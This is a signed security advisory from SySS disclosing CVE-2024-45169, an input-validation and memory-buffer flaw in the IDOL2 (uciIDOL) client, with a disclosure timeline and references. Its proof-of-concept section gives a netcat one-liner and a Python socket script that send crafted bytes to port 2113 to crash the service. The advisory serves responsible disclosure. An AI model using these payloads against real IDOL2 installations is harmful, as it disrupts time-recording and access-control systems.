-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-052 Product: IDOL2 (uciIDOL) Manufacturer: UCI Software GmbH Affected Version(s): ≤ 2.12 Tested Version(s): 2.12 Vulnerability Type: Improper Input Validation (CWE-20), Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2024-06-26 Solution Date: Public Disclosure: 2024-08-19 CVE Reference: CVE-2024-45169 Authors of Advisory: Ludwig Stage and Manuel Stotz, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: IDOL2 is a so-called rich client application for uciIDOL and seems to be able to provide different functionality, e.g. personnel time recording. The manufacturer describes the product as follows (see [1]): "Die uciIDOL-Produktfamilie umfasst modular einsetzbare Anwendungen für die Bereiche der Personalzeit- und Betriebsdatenerfassung sowie für die Zutrittskontrolle und Warenwirtschaft. Innerhalb dieser Hauptgruppen bieten wir Ihnen zahlreiche Funktionsbausteine, um Ihnen ein auf Ihre Bedürfnisse angepasstes System zu ermöglichen. Nach Bedarf können Sie diese durch die einzeln wählbare Module des idolWEB ergänzen. Die webbasierten Anwendungen bieten Ihnen flexibel einsetzbare Erweiterungen und zusätzliche Möglichkeiten im Umgang mit den uciIDOL-Anwendungen." Due to improper input validation, improper deserialization and improper restriction of operations within the bounds of a memory buffer, IDOL2 is vulnerable to denial-of-service (DoS) attacks and possibly remote code execution. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): cat <(echo -en "\xB0\x00\x3c") /dev/urandom | nc 127.0.0.1 2113 #!/usr/bin/env python3 import socket HOST = "127.0.0.1" PORT = 2113 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.settimeout(None) MESSAGE=b"\xB0\x00\x3c" + (b"\x41") print("Send message: " + str(MESSAGE)) s.send(MESSAGE) s.close() ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-06-26: Vulnerability reported to manufacturer 2024-06-26: Queries by the manufacturer about the circumstances under which the vulnerability was discovered 2024-06-27: Answers given to manufacturer and an offer to talk 2024-06-27: Invitation to a discussion with manufacturer 2024-07-03: Rejection of the offer to a call by the manufacturer 2024-08-12: Advisories sent to the manufacturer prior to publication 2024-08-19: Public disclosure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for uciIDOL https://uci.de/products/index.html [2] SySS Security Advisory SYSS-2024-052 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-052.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] IDOL2 client download site https://uci.de/download/idol2-client.html [5] IDOL2 client binary download http://download.uci.de/idol2/idol2Client_2_12.exe ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Ludwig Stage and Manuel Stotz of SySS GmbH. E-Mail: ludwig.stage@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Ludwig_Stage.asc Key Fingerprint: C2FF F40D FC78 791E EF81 20DF 4B57 48C9 53A5 EE5E ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEwv/0Dfx4eR7vgSDfS1dIyVOl7l4FAmbG7M8ACgkQS1dIyVOl 7l4LUBAAi8lBrw6lbA99/6r7TytffG9bIrNeiu8UHILzvIEMAOEbBepjwPBIqJtX tkZk2f/GOKy3QJX6YJoLf7IY1TfT9LV+FaFVmgTnu83yom0nrhN247SrpT8oiKgQ bkmcL3FJDTp/6DRPlFNaNHJCalrpuEt1nvUxU18/LeQwwq41OA2afd6AZ+nOiZoe 1tsYEYbjQ8RImXls3EubalxHHLGjvh+l60aJLrxMvjCZ0LXcvrlM5BNkDzP6qeKu y0Yc/0MHCx35Oywchqblii8QwaKROouQ1Q5Z2K50GyaW41eUsU0+TWE6cOmsxJZ6 AayKD5H0uDAqQSJAb1fLeoiYz5Txz4k/WKdAjZ5mEhhK9P4RWLORiaXSUK6k3P4O dOMvaLK7QOn8SCmVc9EOYRwVfOjjDB8tGAXeNYX3NQ7yA20MmdOfQxjzrWztq9Pr 4uu3CkfhZD/cIODk/7qhN0Ax0+j4N2t9dakBvQUIVGstMhQ+4Q0G0OBw28ch9mnQ lZkyLc+DUljS+HMjvJ90lnL5/sheIb6kxre9ufX5s9AnZWHYonEj3DChe1PzZnXD VOQ+/ga+6fhroleYiNxqUXCPuLu1zx3hfDPZ4Ld+BW8tqcEYoOX4k3TTILnNZ+QZ 82KureuTr//L5Wx8O/YLlIcJxQrrHp5e4na2LjCNeaCU3Yj4SuA= =YeTW -----END PGP SIGNATURE-----